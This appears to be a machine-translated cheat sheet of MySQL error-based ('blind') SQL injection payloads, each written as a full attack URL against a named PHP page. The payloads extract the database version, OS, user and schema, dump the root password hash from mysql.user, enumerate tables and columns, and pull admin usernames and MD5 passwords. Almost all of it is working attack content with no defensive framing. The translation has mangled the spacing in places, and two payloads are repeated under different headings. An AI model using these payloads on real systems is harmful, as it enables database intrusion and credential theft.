Mysql blind injection common statements

 

Ps: % 20 in the original text. I replaced it with/**/to facilitate viewing.

 

Judge version:

 

Http://www.bkjia.com/tmd. php? Id = 352 & wsid = 1/**/and/**/(1, 1) % 3E (select/**/count (*), concat (select/**/@ version/**/), 0x3a, floor (rand () * 2 )) /**/x/**/from/**/(select/**/1/**/union/**/select/**/2) /**/a/**/group/**/by/**/x/**/limit/**/1) % 23

 

 

Judgment System

 

Http://www.bkjia.com/tmd. php? Id = 352 & wsid = 1/**/and/**/(1, 1) % 3E (select/**/count (*), concat (select/**/@ version_compile_ OS/**/), 0x3a, floor (rand () * 2 )) /**/x/**/from/**/(select/**/1/**/union/**/select/**/2) /**/a/**/group/**/by/**/x/**/limit/**/1) % 23

 

 

Current user ()

 

Http://www.bkjia.com/tmd. php? Id = 352 & wsid = 1/**/and/**/(1, 1) % 3E (select/**/count (*), concat (select/**/user ()/**/), 0x3a, floor (rand () * 2 )) /**/x/**/from/**/(select/**/1/**/union/**/select/**/2) /**/a/**/group/**/by/**/x/**/limit/**/1) % 23

 

 

Current database ()

 

Http://www.bkjia.com/tmd. php? Id = 352 & wsid = 1/**/and/**/(1, 1) % 3E (select/**/count (*), concat (select/**/database ()/**/), 0x3a, floor (rand () * 2 )) /**/x/**/from/**/(select/**/1/**/union/**/select/**/2) /**/a/**/group/**/by/**/x/**/limit/**/1) % 23

 

 

Brute-force root hash

 

Http://www.bkjia.com/tmd. php? Id = 352 & wsid = 1/**/and/**/(1, 1) % 3E (select/**/count (*), concat (select/**/Password/**/from/**/mysql. user/**/where/**/User = char (114,111,111,116), 0x3a, floor (rand () * 2 )) /**/x/**/from/**/(select/**/1/**/union/**/select/**/2) /**/a/**/group/**/by/**/x/**/limit/**/1) % 23

 

 

Current Database Table Name

 

Http://www.bkjia.com/tmd. php? Id = 352 & wsid = 1/**/and/**/(1, 1) % 3E (select/**/count (*), concat (select/**/TABLE_NAME/** // **/from/**/information_schema.tables/**/where/**/TABLE_SCHEMA = char (115,97, 110,115, 97,110, 49)/**/limit/**/6, 1), 0x3a, floor (rand () * 2 )) /**/x/**/from/**/(select/**/1/**/union/**/select/**/2) /**/a/**/group/**/by/**/x/**/limit/**/1) % 23

 

 

User_name field of the current database

 

Http://www.bkjia.com/tmd. php? Id = 352 & wsid = 1/**/and/**/(1, 1) % 3E (select/**/count (*), concat (select/** // **/COLUMN_NAME/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_SCHEMA = char (115,97, 110,115, 97,110, 49)/**/and/**/TABLE_NAME = char (97,100,109,105,110, 99, 115,95, 95,117,115,101,114,)/**/limit/**/), 0x3a, floor (rand () * 2 )) /**/x/**/from/**/(select/**/1/**/union/**/select/**/2) /**/a/**/group/**/by/**/x/**/limit/**/1) % 23

 

 

Password of the current database Field

 

Http://www.bkjia.com/tmd. php? Id = 352 & wsid = 1/**/and/**/(1, 1) % 3E (select/**/count (*), concat (select/** // **/COLUMN_NAME/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_SCHEMA = char (115,97, 110,115, 97,110, 49)/**/and/**/TABLE_NAME = char (97,100,109,105,110, 99, 115,95, 95,117,115,101,114,)/**/limit/**/), 0x3a, floor (rand () * 2 )) /**/x/**/from/**/(select/**/1/**/union/**/select/**/2) /**/a/**/group/**/by/**/x/**/limit/**/1) % 23

 

 

Obtain admin passwd (md5)

 

Http://www.bkjia.com/tmd. php? Id = 352 & wsid = 1/**/and/**/(1, 1) % 3E (select/**/count (*), concat (select/**/concat_ws (char (94), ifnull (cast (% 60 password % 60/**/as/**/char ), char (32), ifnull (cast (% 60user_name % 60/**/as/**/char), char (32 ))) /** // **/from/**/sansan1.ecs _ admin_user/**/limit/**/), 0x3a, floor (rand () * 2 )) /**/x/**/from/**/(select/**/1/**/union/**/select/**/2) /**/a/**/group/**/by/**/x/**/limit/**/1) % 23